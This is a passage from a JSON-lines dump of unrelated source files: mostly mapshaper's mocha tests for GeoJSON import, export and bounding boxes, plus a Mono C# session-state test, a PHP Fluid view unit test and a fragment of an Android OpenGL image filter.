JsonSerializationContext.builder()\n .serializeNulls( false ).build() ) );\n }\n}\n"} {"text": "var api = require('../'),\n DataTable = api.internal.DataTable,\n assert = require('assert');\n\nvar Utils = api.utils;\n\nfunction fixPath(p) {\n return require('path').join(__dirname, p);\n}\n\ndescribe('mapshaper-geojson.js', function () {\n\n describe('getDatasetBbox()', function() {\n\n describe('RFC 7946 bbox', function() {\n function getBbox(geojson) {\n var d = api.internal.importGeoJSON(geojson, {});\n return api.internal.getDatasetBbox(d, true);\n }\n\n it('wrapped bbox 1', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[-170, 0], [170, 0]]\n }\n assert.deepEqual(getBbox(input), [170, 0, -170, 0]);\n })\n\n it('wrapped bbox2', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[-180, 0], [180, 1], [10, -1]]\n }\n assert.deepEqual(getBbox(input), [10, -1, -180, 1]);\n })\n\n it('wrapped bbox 3 (lines)', function() {\n var input = {\n type: 'MultiLineString',\n coordinates: [[[-180, 0], [-170, 1]], [[170, -1], [175, -2]]]\n }\n assert.deepEqual(getBbox(input), [170, -2, -170, 1]);\n })\n\n it('non-wrapped points: Western Hemisphere', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[-170, 0], [-180, 1], [-90, -1]]\n }\n assert.deepEqual(getBbox(input), [-180, -1, -90, 1]);\n })\n\n it('non-wrapped points: Eastern Hemisphere', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[170, 0], [180, 1], [90, -1]]\n }\n assert.deepEqual(getBbox(input), [90, -1, 180, 1]);\n })\n\n it('non-wrapped points 3', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[100, 0], [0, 1], [-100, -1]]\n }\n assert.deepEqual(getBbox(input), [-100, -1, 100, 1]);\n })\n\n it('null bbox', function() {\n var input = {\n type: 'GeometryCollection',\n geometries: []\n }\n assert.strictEqual(getBbox(input), null);\n })\n\n });\n\n });\n\n\n describe('importGeoJSON', function () {\n it('Import FeatureCollection with polygon geometries', function () {\n var data = api.importFile(fixPath('data/two_states.json'))\n assert.equal(data.layers[0].shapes.length, 2);\n assert.equal(data.layers[0].data.size(), 2);\n })\n\n it('Import FeatureCollection with three null geometries', function () {\n var data = api.importFile(fixPath('data/six_counties_three_null.json'), 'geojson');\n assert.equal(data.layers[0].data.size(), 6);\n assert.equal(data.layers[0].shapes.length, 6);\n assert.equal(data.layers[0].shapes.filter(function(shape) {return shape != null}).length, 3)\n assert.deepEqual(Utils.pluck(data.layers[0].data.getRecords(), 'NAME'), [\"District of Columbia\", \"Arlington\", \"Fairfax County\", \"Alexandria\", \"Fairfax City\", \"Manassas\"]);\n })\n\n it('Able to import GeometryCollection containing null geometry (non-standard)', function() {\n var geojson = {\n type: 'GeometryCollection',\n geometries: [\n null,\n {type: 'Point', coordinates: [1, 1]}\n ]\n };\n var dataset = api.internal.importGeoJSON(geojson, {});\n assert.deepEqual(dataset.layers[0].shapes, [null, [[1, 1]]]);\n\n })\n\n it('Able to import Feature containing GeometryCollection of same-type objects', function() {\n var json = {\n \"type\": \"Feature\",\n \"properties\": {\"name\": \"A\"},\n \"geometry\": {\n \"type\": \"GeometryCollection\",\n \"geometries\": [{\n \"type\": \"MultiPoint\",\n \"coordinates\": [[0, 1], [2, 3]]\n }, {\n \"type\": \"Point\",\n \"coordinates\": [4, 5]\n }\n ]\n }\n };\n var dataset = api.internal.importGeoJSON(json, {});\n 
assert.deepEqual(dataset.layers[0].shapes, [[[0, 1], [2, 3], [4, 5]]])\n })\n\n it('Unable to import Feature containing mixed geometry types', function() {\n var json = {\n \"type\": \"Feature\",\n \"properties\": {\"name\": \"A\"},\n \"geometry\": {\n \"type\": \"GeometryCollection\",\n \"geometries\": [{\n \"type\": \"MultiPoint\",\n \"coordinates\": [[0, 1], [2, 3]]\n }, {\n \"type\": \"LineString\",\n \"coordinates\": [[0, 1], [2, 3], [4, 5]]\n }, {\n \"type\": \"Polygon\",\n \"coordinates\": [[[0, 1], [1, 1], [0, 0], [0, 1]]]\n }\n ]\n }\n };\n\n assert.throws(function() {api.internal.importGeoJSON(json, {});}, /Unable to import mixed/);\n });\n\n it('Import FeatureCollection with mixed geometry types', function() {\n var json = {\n type: \"FeatureCollection\",\n features: [{\n type: \"Feature\",\n properties: null,\n geometry: {\n type: \"MultiPoint\",\n coordinates: [[0, 1], [2, 3]]\n }\n }, {\n type: \"Feature\",\n properties: {name: \"A\"},\n geometry: {\n type: \"LineString\",\n coordinates: [[0, 1], [2, 3], [4, 5]]\n }\n }, {\n type: \"Feature\",\n properties: {name: \"B\"},\n geometry: {\n type: \"Polygon\",\n coordinates: [[[0, 1], [1, 1], [0, 0], [0, 1]]]\n }\n }]\n };\n\n var target = {\n info: {},\n arcs: [[[0, 1], [2, 3], [4, 5]], [[0, 1], [1, 1], [0, 0], [0, 1]]],\n layers: [{\n geometry_type: 'point',\n data: [{}],\n shapes: [[[0, 1], [2, 3]]]\n }, {\n geometry_type: \"polyline\",\n data: [{name: \"A\"}],\n shapes: [[[0]]]\n }, {\n geometry_type: \"polygon\",\n data: [{name: \"B\"}],\n shapes: [[[1]]]\n }]\n }\n\n var dataset = api.internal.importGeoJSON(json, {});\n var data = JSON.stringify(dataset)\n assert.deepEqual(JSON.parse(data), target);\n })\n\n it('Import Feature with id field', function () {\n var obj = {\n type: 'Feature',\n id: 'foo',\n properties: {},\n geometry: {\n type: 'Point',\n coordinates: [2, 1]\n }\n };\n var dataset = api.internal.importGeoJSON(obj, {id_field: 'name'});\n var records = dataset.layers[0].data.getRecords();\n assert.deepEqual(records, [{name: 'foo'}]);\n })\n\n\n it('Import GeometryCollection inside a feature', function() {\n var src = {\n type: 'Feature',\n properties: {id: 0},\n geometry: {\n type: 'GeometryCollection',\n geometries: [{\n type: \"Polygon\",\n coordinates: [[[3, 1], [1, 1], [2, 3], [3, 1]]]\n }, {\n type: \"Polygon\",\n coordinates: [[[5, 3], [4, 1], [3, 3], [5, 3]]]\n }]\n }\n }\n // Separate Polygons are convered into a MultiPolygon\n var target = {\n type: 'Feature',\n properties: {id: 0},\n geometry: {\n type: 'MultiPolygon',\n coordinates: [[[[3, 1], [1, 1], [2, 3], [3, 1]]], [[[5, 3], [4, 1], [3, 3], [5, 3]]]]\n }\n };\n var dataset = api.internal.importGeoJSON(src, {});\n var output = api.internal.exportDatasetAsGeoJSON(dataset, {});\n assert.deepEqual(output.features[0], target);\n })\n })\n\n\n describe('exportGeoJSON()', function () {\n\n describe('-o geojson-type= option', function() {\n\n it('geojson-type=Feature, no attributes', function() {\n var input = {type: 'Point', coordinates: [0, 0]};\n var output = api.internal.exportGeoJSON(api.internal.importGeoJSON(input, {}), {geojson_type: 'Feature'})[0].content;\n assert.deepEqual(JSON.parse(output), {\n type: 'Feature',\n properties: null,\n geometry: {\n type: 'Point',\n coordinates: [0, 0]\n }\n });\n });\n\n it('geojson-type=FeatureCollection, no attributes', function() {\n var input = {type: 'Point', coordinates: [0, 0]};\n var output = api.internal.exportGeoJSON(api.internal.importGeoJSON(input, {}), {geojson_type: 
'FeatureCollection'})[0].content;\n assert.deepEqual(JSON.parse(output), {\n type: 'FeatureCollection',\n features: [{\n type: 'Feature',\n properties: null,\n geometry: {\n type: 'Point',\n coordinates: [0, 0]\n }\n }]\n });\n });\n\n it('geojson-type=GeometryCollection (data has attributes)', function() {\n var input = {type: 'Feature', properties: {name: 'foo'}, geometry: {type: 'Point', coordinates: [0, 0]}};\n var output = api.internal.exportGeoJSON(api.internal.importGeoJSON(input, {}), {geojson_type: 'GeometryCollection'})[0].content;\n assert.deepEqual(JSON.parse(output), {\n type: 'GeometryCollection',\n geometries: [ {\n type: 'Point',\n coordinates: [0, 0]\n }]\n });\n });\n\n });\n\n describe('-o rfc7946 option', function () {\n\n // rfc7946 flag still truncates coordinates\n // (now deprecated, because output is rfc 7946 compatible by default)\n it('Default coordinate precision is 6 decimals', function() {\n var input = {\n type: 'MultiPoint',\n coordinates: [[4.000000000000001, 3.999999999999], [0.123456789,-9.87654321]]\n };\n var output = api.internal.exportGeoJSON(api.internal.importGeoJSON(input, {}), {rfc7946: true})[0].content.toString();\n var coords = output.match(/\"coordinates.*\\]\\]/)[0];\n assert.equal(coords, '\"coordinates\":[[4,4],[0.123457,-9.876543]]');\n });\n\n it('A warning is generated for non-lat-long datasets', function() {\n var input = {\n type: 'Point',\n coordinates: [100, 100]\n },\n dataset = api.internal.importGeoJSON(input, {});\n assert(/RFC 7946 warning/.test(api.internal.getRFC7946Warnings(dataset)));\n })\n\n it('Use CCW winding order for rings and CW for holes', function (done) {\n var input = {\n type:\"GeometryCollection\",\n geometries:[{\n type: \"Polygon\",\n coordinates: [[[100.0, 0.0], [100.0, 10.0], [110.0, 10.0], [110.0, 0.0], [100.0, 0.0]],\n [[101.0, 1.0], [109.0, 1.0], [109.0, 9.0], [101.0, 9.0], [101.0, 1.0]]\n ]\n }]};\n\n var target = [[[100.0, 0.0], [110.0, 0.0], [110.0, 10.0], [100.0, 10.0], [100.0, 0.0]],\n [[101.0, 1.0], [101.0, 9.0], [109.0, 9.0], [109.0, 1.0], [101.0, 1.0]]\n ];\n\n api.applyCommands('-i input.json -o output.json rfc7946', {'input.json': input}, function(err, output) {\n var json = JSON.parse(output['output.json']);\n assert.deepEqual(json.geometries[0].coordinates, target);\n done();\n });\n\n })\n })\n\n describe('-i geometry-type option', function () {\n it('filters geometry types inside nested GeometryCollection', function (done) {\n var geo = {\n type: 'GeometryCollection',\n geometries: [{\n type: 'GeometryCollection',\n geometries: [{\n type: 'Point',\n coordinates: [0, 0]\n }, {\n type: 'LineString',\n coordinates: [[1, 1], [0, 1]]\n }, {\n type: 'Polygon',\n coordinates: [[[5, 5], [5, 6], [6, 6], [5, 5]]]\n }]\n }]\n };\n var expect = {\n type: 'GeometryCollection',\n geometries: [{\n type: 'Point',\n coordinates: [0, 0]\n }]\n }\n api.applyCommands('-i geo.json geometry-type=point -o', {'geo.json': geo}, function(err, output) {\n var geom = JSON.parse(output['geo.json']);\n assert.deepEqual(geom, expect)\n done();\n });\n })\n })\n\n describe('-o combine-layers option', function () {\n it('combines datasets derived from same input file', function(done) {\n var a = {\n type: 'Feature',\n properties: {foo: 'a'},\n geometry: {\n type: 'LineString',\n coordinates: [[0, 0], [1, 1]]\n }\n };\n api.applyCommands('-i a.json -filter true + name=a2 -o combine-layers', {'a.json': a}, function(err, output) {\n assert.deepEqual(JSON.parse(output['a.json']), {\n type: 'FeatureCollection',\n features: [a, 
a]\n });\n done();\n });\n\n });\n\n it('combines datasets of different types from different sources', function (done) {\n var a = {\n type: 'Feature',\n properties: {foo: 'a'},\n geometry: {\n type: 'LineString',\n coordinates: [[0, 0], [1, 1]]\n }\n };\n var b = {\n type: 'Point',\n coordinates: [2, 2]\n };\n api.applyCommands('-i a.json -i b.json -o combine-layers c.json', {'a.json': a, 'b.json': b}, function(err, output) {\n assert('c.json' in output);\n assert.deepEqual(JSON.parse(output['c.json']), {\n type: 'FeatureCollection',\n features: [a,\n {\n type: 'Feature',\n properties: null,\n geometry: b\n }]\n });\n done();\n });\n })\n\n it('generated GeometryCollection when none of the layers have attribute data', function(done) {\n var a = {\n type: 'LineString',\n coordinates: [[0, 0], [1, 1]]\n };\n var b = {\n type: 'Polygon',\n coordinates: [[[2, 2], [2, 3], [3, 2], [2, 2]]]\n };\n api.applyCommands('-i a.json b.json combine-files -o gj2008 combine-layers', {'a.json': a, 'b.json': b}, function(err, output) {\n assert.deepEqual(JSON.parse(output['output.json']), {\n type: 'GeometryCollection',\n geometries: [a, b]\n });\n done();\n });\n })\n\n it('respects -o target= option', function(done) {\n var a = {\n type: 'LineString',\n coordinates: [[0, 0], [1, 1]]\n };\n var b = {\n type: 'Polygon',\n coordinates: [[[2, 2], [2, 3], [3, 2], [2, 2]]]\n };\n api.applyCommands('-i a.json b.json combine-files -o target=a combine-layers', {'a.json': a, 'b.json': b}, function(err, output) {\n assert.deepEqual(JSON.parse(output['a.json']), {\n type: 'GeometryCollection',\n geometries: [a]\n });\n done();\n });\n\n })\n\n })\n\n it('default file extension is .json', function(done) {\n api.applyCommands('-i test/data/two_states.json -o', {}, function(err, output) {\n assert('two_states.json' in output);\n done();\n })\n\n })\n\n it('-o extension= overrides default file extension', function(done) {\n api.applyCommands('-i test/data/two_states.json -o extension=geojson', {}, function(err, output) {\n assert('two_states.geojson' in output);\n done();\n })\n\n })\n\n it('export FeatureCollection with null geometries if no shapes are present', function() {\n var lyr = {\n data: new DataTable([{foo: 'a'}])\n }\n var dataset = {\n layers: [lyr]\n };\n var target = {type: \"FeatureCollection\", features: [\n {type: 'Feature', geometry: null, properties: {foo: 'a'}}\n ]};\n\n assert.deepEqual(api.internal.exportDatasetAsGeoJSON(dataset, {}), target);\n })\n\n it('collapsed polygon exported as null geometry', function () {\n var arcs = new api.internal.ArcCollection([[[1, 1], [2, 3], [1, 1]]]);\n var lyr = {\n geometry_type: \"polygon\",\n data: new DataTable([{ID: 1}]),\n shapes: [[[0]]]\n };\n var dataset = {\n arcs: arcs,\n layers: [lyr]\n };\n\n var target = {\"type\":\"FeatureCollection\",\"features\":[\n {type: 'Feature', properties: {ID: 1}, geometry: null}\n ]};\n\n assert.deepEqual(api.internal.exportDatasetAsGeoJSON(dataset, {}), target);\n })\n\n it('use cut_table option', function () {\n var arcs = new api.internal.ArcCollection([[[1, 1], [1, 3], [2, 3], [1, 1]]]);\n var lyr = {\n geometry_type: \"polygon\",\n data: new DataTable([{ID: 1}]),\n shapes: [[[0]]]\n };\n\n var geojson = {\"type\":\"GeometryCollection\",\"geometries\":[\n { type: 'Polygon',\n coordinates: [[[1, 1], [1, 3], [2, 3], [1, 1]]]\n }\n ]};\n var table = [{\n ID: 1\n }];\n var opts = {\n cut_table: true,\n format: 'geojson',\n gj2008: true\n };\n var files = api.internal.exportFileContent({layers:[lyr], arcs:arcs}, opts);\n 
assert.deepEqual(JSON.parse(files[0].content), geojson);\n assert.deepEqual(JSON.parse(files[1].content), table);\n })\n\n it('use drop_table and id_field options', function () {\n var arcs = new api.internal.ArcCollection([[[1, 1], [1, 3], [2, 3], [1, 1]]]);\n var lyr = {\n geometry_type: \"polygon\",\n data: new DataTable([{FID: 1}]),\n shapes: [[[0]]]\n };\n\n var geojson = {\"type\":\"FeatureCollection\", \"features\":[{\n type: \"Feature\",\n properties: null,\n id: 1,\n geometry: {\n type: 'Polygon',\n coordinates: [[[1, 1], [1, 3], [2, 3], [1, 1]]]\n }\n }]};\n\n var opts = {\n drop_table: true,\n id_field: 'FID',\n format: 'geojson',\n gj2008: true\n };\n var files = api.internal.exportFileContent({layers:[lyr], arcs:arcs}, opts);\n assert.deepEqual(JSON.parse(files[0].content), geojson);\n })\n\n it('export points with bbox', function() {\n var lyr = {\n geometry_type: 'point',\n shapes: [[[0, 1]], [[2, 3], [1, 4]]]\n },\n dataset = {\n layers: [lyr]\n };\n\n var target = {\n type: \"GeometryCollection\",\n geometries: [{\n type: \"Point\",\n coordinates: [0,1]\n }, {\n type: \"MultiPoint\",\n coordinates: [[2, 3], [1, 4]]\n }],\n bbox: [0, 1, 2, 4]\n };\n\n var result = api.internal.exportDatasetAsGeoJSON(dataset, {bbox: true});\n assert.deepEqual(result, target);\n })\n\n it('export polygons with bbox', function() {\n var arcs = new api.internal.ArcCollection(\n [[[1, 1], [1, 3], [2, 3], [1, 1]],\n [[-1, 1], [0, 0], [0, 1], [-1, 1]]]),\n lyr = {\n geometry_type: \"polygon\",\n shapes: [[[0]], [[~1]]]\n },\n dataset = {\n arcs: arcs,\n layers: [lyr]\n };\n\n var target = {\"type\":\"GeometryCollection\",\"geometries\":[\n { type: 'Polygon',\n coordinates: [[[1, 1], [1, 3], [2, 3], [1, 1]]]\n }, { type: 'Polygon',\n coordinates: [[[-1, 1], [0, 1], [0, 0], [-1, 1]]]\n }\n ]\n , bbox: [-1, 0, 2, 3]\n };\n var result = api.internal.exportDatasetAsGeoJSON(dataset, {bbox: true});\n assert.deepEqual(result, target);\n })\n\n it('export feature with id property', function() {\n var lyr = {\n geometry_type: \"point\",\n shapes: [[[1, 1]]],\n data: new DataTable([{FID: 1}])\n },\n dataset = {\n layers: [lyr]\n };\n\n var target = {\"type\":\"FeatureCollection\",\"features\":[{\n type: 'Feature',\n properties: null,\n id: 1,\n geometry: { type: 'Point',\n coordinates: [1, 1]\n }\n }]\n };\n var result = api.internal.exportDatasetAsGeoJSON(dataset, {id_field: 'FID'});\n assert.deepEqual(result, target);\n })\n\n })\n\n describe('Import/Export roundtrip tests', function () {\n\n it('empty GeometryCollection', function () {\n var empty = {\"type\":\"GeometryCollection\",\"geometries\":[]};\n assert.deepEqual(empty, importExport(empty));\n })\n\n it('preserve object data properties', function() {\n var input = {type:\"FeatureCollection\", features: [{\n type: \"Feature\",\n properties: {\n foo: {\"a\": 3},\n bar: [2, 3, 4]\n },\n geometry: null\n }]};\n assert.deepEqual(input, importExport(input));\n })\n\n it('preserve top-level crs', function(done) {\n var crs = {\n \"type\": \"name\",\n \"properties\": {\"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\"}\n };\n var input = {\n crs: crs,\n type: 'Point',\n coordinates: [0, 0]\n };\n api.applyCommands('-o gj2008', input, function(err, data) {\n var output = JSON.parse(data);\n assert.deepEqual(output.crs, crs);\n done();\n })\n });\n\n // REMOVING obsolete crs test\n // it('preserve null crs', function(done) {\n // var input = {\n // crs: null,\n // type: 'Point',\n // coordinates: [0, 0]\n // };\n // api.applyCommands('', input, function(err, data) 
{\n // var output = JSON.parse(data);\n // assert.strictEqual(output.crs, null);\n // done();\n // })\n // });\n\n // REMOVING obsolete crs test\n // it('set crs to null if data is projected', function(done) {\n // var crs = {\n // \"type\": \"name\",\n // \"properties\": {\"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\"}\n // };\n // var input = {\n // crs: crs,\n // type: 'Point',\n // coordinates: [0, 0]\n // };\n // api.applyCommands('-proj +proj=merc', input, function(err, data) {\n // var output = JSON.parse(data);\n // assert.strictEqual(output.crs, null);\n // done();\n // })\n // });\n\n it('do not set crs to null if coords were transformed to latlong', function(done) {\n var input = {\n type: 'Point',\n coordinates: [0, 0]\n };\n api.applyCommands('-proj wgs84 from=\"merc\"', input, function(err, data) {\n var output = JSON.parse(data);\n assert.strictEqual(output.crs, undefined);\n done();\n })\n });\n\n it('preserve ids with no properties', function() {\n var input = {\n type: \"FeatureCollection\",\n features: [{\n type: \"Feature\",\n properties: null,\n id: 'A',\n geometry: {\n type: \"Point\",\n coordinates: [1, 1]\n }\n }]\n };\n assert.deepEqual(input, importExport(input));\n })\n\n it('preserve ids with properties', function() {\n var input = {\n type: \"FeatureCollection\",\n features: [{\n type: \"Feature\",\n properties: {foo: 'B', bar: 'C'},\n id: 'A',\n geometry: {\n type: \"Point\",\n coordinates: [1, 1]\n }\n }]\n };\n assert.deepEqual(input, importExport(input));\n })\n\n\n it('null geom, one property', function () {\n var geom = {\"type\":\"FeatureCollection\", \"features\":[\n { type: \"Feature\",\n geometry: null,\n properties: {ID: 0}\n }\n ]};\n assert.deepEqual(geom, importExport(geom));\n })\n\n it('collapsed polygon converted to null geometry', function() {\n var geom = {\"type\":\"FeatureCollection\", \"features\":[\n { type: \"Feature\",\n geometry: {\n type: \"Polygon\",\n coordinates: [[[100.0, 0.0], [100.0, 1.0], [100.0, 0.0]]]\n },\n properties: {ID: 0}\n }\n ]};\n\n var target = {\"type\":\"FeatureCollection\", \"features\":[\n { type: \"Feature\",\n geometry: null,\n properties: {ID: 0}\n }\n ]};\n\n assert.deepEqual(target, importExport(geom));\n })\n\n it('ccw polygon and cw hole are reversed', function() {\n var onePoly = {\n type:\"GeometryCollection\",\n geometries:[{\n type: \"Polygon\",\n coordinates: [[[100.0, 0.0], [110.0, 0.0], [110.0, 10.0], [100.0, 10.0], [100.0, 0.0]],\n [[101.0, 1.0], [101.0, 9.0], [109.0, 9.0], [109.0, 1.0], [101.0, 1.0]]]\n }]};\n var output = importExport(onePoly);\n var target = {\n type:\"GeometryCollection\",\n // bbox: [100, 0, 110, 10],\n geometries:[{\n type: \"Polygon\",\n coordinates: [[[100.0, 0.0], [100.0, 10.0], [110.0, 10.0], [110.0, 0.0], [100.0, 0.0]],\n [[101.0, 1.0], [109.0, 1.0], [109.0, 9.0], [101.0, 9.0], [101.0, 1.0]]\n ]\n }]};\n assert.deepEqual(target, output);\n })\n\n it('reversed ring with duplicate points is not removed (#42)', function() {\n var geoStr = api.cli.readFile(fixPath(\"data/ccw_polygon.json\"), 'utf8'),\n outputObj = importExport(geoStr);\n assert.ok(outputObj.features[0].geometry != null);\n })\n\n\n it('GeometryCollection with a Point and a MultiPoint', function() {\n var json = {\n type: \"GeometryCollection\",\n geometries:[{\n type: \"Point\",\n coordinates: [2, 1]\n }, {\n type: \"MultiPoint\",\n coordinates: [[1, 0], [1, 0]]\n }]\n };\n\n assert.deepEqual(importExport(json), json);\n })\n\n\n it('FeatureCollection with two points and a null geometry', function() {\n var 
json = {\n type: \"FeatureCollection\",\n features:[{\n type: \"Feature\",\n properties: {id: 'pdx'},\n geometry: {\n type: \"Point\",\n coordinates: [0, 0]\n }\n }, {\n type: \"Feature\",\n properties: {id: 'sfo'},\n geometry: {\n type: \"Point\",\n coordinates: [-1, 1]\n }\n }, {\n type: \"Feature\",\n properties: {id: ''},\n geometry: null\n }]\n };\n\n assert.deepEqual(importExport(json), json);\n })\n\n })\n\n describe('Export/Import roundtrip tests', function () {\n\n it('two states', function () {\n geoJSONRoundTrip('data/two_states.json');\n })\n\n it('six counties, two null geometries', function () {\n geoJSONRoundTrip('data/six_counties_three_null.json');\n })\n\n it('Internal state borders (polyline)', function () {\n geoJSONRoundTrip('data/ne/ne_110m_admin_1_states_provinces_lines.json');\n })\n /* */\n })\n})\n\nfunction geoJSONRoundTrip(fname) {\n var data = api.importFile(fixPath(fname));\n var files = api.internal.exportFileContent(data, {format:'geojson'});\n var json = files[0].content.toString();\n var data2 = api.internal.importFileContent(json, 'json');\n var files2 = api.internal.exportFileContent(data2, {format:'geojson'});\n var json2 = files2[0].content.toString();\n assert.equal(json, json2);\n}\n\nfunction importExport(obj, noTopo) {\n var json = Utils.isString(obj) ? obj : JSON.stringify(obj);\n var geom = api.internal.importFileContent(json, 'json', {no_topology: noTopo});\n return api.internal.exportDatasetAsGeoJSON(geom, {});\n}\n"} {"text": "\t\n\n
\n\t

\n\t\n
\n"} {"text": "//\n// Authors:\n// Rafael Mizrahi \n// Erez Lotan \n// Vladimir Krasnov \n//\n//\n// Copyright (c) 2002-2005 Mainsoft Corporation.\n//\n// Permission is hereby granted, free of charge, to any person obtaining\n// a copy of this software and associated documentation files (the\n// \"Software\"), to deal in the Software without restriction, including\n// without limitation the rights to use, copy, modify, merge, publish,\n// distribute, sublicense, and/or sell copies of the Software, and to\n// permit persons to whom the Software is furnished to do so, subject to\n// the following conditions:\n//\n// The above copyright notice and this permission notice shall be\n// included in all copies or substantial portions of the Software.\n//\n// THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\n// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\n// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\n// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n//\n\nusing System;\nusing System.Collections;\nusing System.Web;\nusing System.Web.UI;\nusing System.Web.UI.WebControls;\nusing System.Web.UI.HtmlControls;\n\nnamespace GHTTests.System_Web_dll.System_Web_SessionState\n{\n\tpublic class HttpSessionState_GetEnumerator_\n\t\t: GHTBaseWeb \n\t{\n\t\t#region Web Form Designer generated code\n\t\toverride protected void OnInit(EventArgs e) \n\t\t{\n\t\t\t//\n\t\t\t// CODEGEN: This call is required by the ASP.NET Web Form Designer.\n\t\t\t//\n\t\t\tInitializeComponent();\n\t\t\tbase.OnInit(e);\n\t\t}\n\t\t\n\t\t/// \n\t\t/// Required method for Designer support - do not modify\n\t\t/// the contents of this method with the code editor.\n\t\t/// \n\t\tprivate void InitializeComponent() \n\t\t{ \n\t\t\tthis.Load += new System.EventHandler(this.Page_Load);\n\t\t}\n\t\t#endregion\n\n\t\tprivate void Page_Load(object sender, System.EventArgs e) \n\t\t{\n\t\t\t//Put user code to initialize the page here\n\n\t\t\tSystem.Web.UI.HtmlControls.HtmlForm frm = (HtmlForm)this.FindControl(\"Form1\");\n\t\t\tGHTTestBegin(frm);\n\n\t\t\tGHTSubTestBegin(\"GHTSubTest1\");\n\t\t\ttry \n\t\t\t{\n\n\t\t\t\tSession.Clear();\n\n\t\t\t\tSession[\"v1\"] = \"value1\";\n\t\t\t\tSession[\"v2\"] = \"value2\";\n\t\t\t\tSession[\"v3\"] = \"value3\";\n\t\t\t\tSession[\"v4\"] = \"value4\";\n\t\t\t\tSession[\"v5\"] = \"value5\";\n\t\t\t\tSession[\"v6\"] = \"value6\";\n\t\t\t\tSession[\"v7\"] = \"value7\";\n\n\t\t\t\tIEnumerator items= Session.GetEnumerator();\n\t\t\t\tstring item;\n\n\t\t\t\twhile ( items.MoveNext() )\n\t\t\t\t{\n\t\t\t\t\titem = (string)items.Current;\n\t\t\t\t\tGHTSubTestAddResult(\"Session(\\\"\" + item + \"\\\") = \" + Session[item]);\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch (Exception ex) \n\t\t\t{\n\t\t\t\tGHTSubTestUnexpectedExceptionCaught(ex);\n\t\t\t}\n\t\t\tGHTSubTestEnd();\n\t\t\tGHTTestEnd();\n\t\t}\n\t}\n}\n"} {"text": "templateVariableContainer = $this->getMockBuilder(TemplateVariableContainer::class)->setMethods(['exists', 'remove', 'add'])->getMock();\n $this->viewHelperVariableContainer = $this->getMockBuilder(ViewHelperVariableContainer::class)->setMethods(['setView'])->getMock();\n $this->renderingContext = $this->getMockBuilder(RenderingContext::class)->setMethods(['getViewHelperVariableContainer', 
'getVariableProvider'])->disableOriginalConstructor()->getMock();\n $this->renderingContext->expects(self::any())->method('getViewHelperVariableContainer')->will(self::returnValue($this->viewHelperVariableContainer));\n $this->renderingContext->expects(self::any())->method('getVariableProvider')->will(self::returnValue($this->templateVariableContainer));\n $this->view = $this->getMockBuilder(AbstractTemplateView::class)->setMethods(['getTemplateSource', 'getLayoutSource', 'getPartialSource', 'canRender', 'getTemplateIdentifier', 'getLayoutIdentifier', 'getPartialIdentifier'])->getMock();\n $this->view->setRenderingContext($this->renderingContext);\n }\n\n /**\n * @test\n */\n public function viewIsPlacedInViewHelperVariableContainer()\n {\n $this->viewHelperVariableContainer->expects(self::once())->method('setView')->with($this->view);\n $this->view->setRenderingContext($this->renderingContext);\n }\n\n /**\n * @test\n */\n public function assignAddsValueToTemplateVariableContainer()\n {\n $this->templateVariableContainer->expects(self::at(0))->method('add')->with('foo', 'FooValue');\n $this->templateVariableContainer->expects(self::at(1))->method('add')->with('bar', 'BarValue');\n\n $this->view\n ->assign('foo', 'FooValue')\n ->assign('bar', 'BarValue');\n }\n\n /**\n * @test\n */\n public function assignCanOverridePreviouslyAssignedValues()\n {\n $this->templateVariableContainer->expects(self::at(0))->method('add')->with('foo', 'FooValue');\n $this->templateVariableContainer->expects(self::at(1))->method('add')->with('foo', 'FooValueOverridden');\n\n $this->view->assign('foo', 'FooValue');\n $this->view->assign('foo', 'FooValueOverridden');\n }\n\n /**\n * @test\n */\n public function assignMultipleAddsValuesToTemplateVariableContainer()\n {\n $this->templateVariableContainer->expects(self::at(0))->method('add')->with('foo', 'FooValue');\n $this->templateVariableContainer->expects(self::at(1))->method('add')->with('bar', 'BarValue');\n $this->templateVariableContainer->expects(self::at(2))->method('add')->with('baz', 'BazValue');\n\n $this->view\n ->assignMultiple(['foo' => 'FooValue', 'bar' => 'BarValue'])\n ->assignMultiple(['baz' => 'BazValue']);\n }\n\n /**\n * @test\n */\n public function assignMultipleCanOverridePreviouslyAssignedValues()\n {\n $this->templateVariableContainer->expects(self::at(0))->method('add')->with('foo', 'FooValue');\n $this->templateVariableContainer->expects(self::at(1))->method('add')->with('foo', 'FooValueOverridden');\n $this->templateVariableContainer->expects(self::at(2))->method('add')->with('bar', 'BarValue');\n\n $this->view->assign('foo', 'FooValue');\n $this->view->assignMultiple(['foo' => 'FooValueOverridden', 'bar' => 'BarValue']);\n }\n}\n"} {"text": "package com.aserbao.androidcustomcamera.whole.record.filters.gpuFilters.baseFilter;\n\nimport android.opengl.GLES20;\n\nimport com.aserbao.androidcustomcamera.base.MyApplication;\nimport com.aserbao.androidcustomcamera.R;\n\nimport com.aserbao.androidcustomcamera.whole.record.filters.gpuFilters.utils.OpenGlUtils;\n\n\npublic class MagicInkwellFilter extends GPUImageFilter {\n\tprivate int[] inputTextureHandles = {-1};\n\tprivate int[] inputTextureUniformLocations = {-1};\n private int mGLStrengthLocation;\n\n\tpublic MagicInkwellFilter(){\n\t\tsuper(NO_FILTER_VERTEX_SHADER, OpenGlUtils.readShaderFromRawResource(R.raw.inkwell));\n\t}\n\t\n\tpublic void onDestroy() {\n super.onDestroy();\n GLES20.glDeleteTextures(1, inputTextureHandles, 0);\n for(int i = 0; i < inputTextureHandles.length; i++)\n 
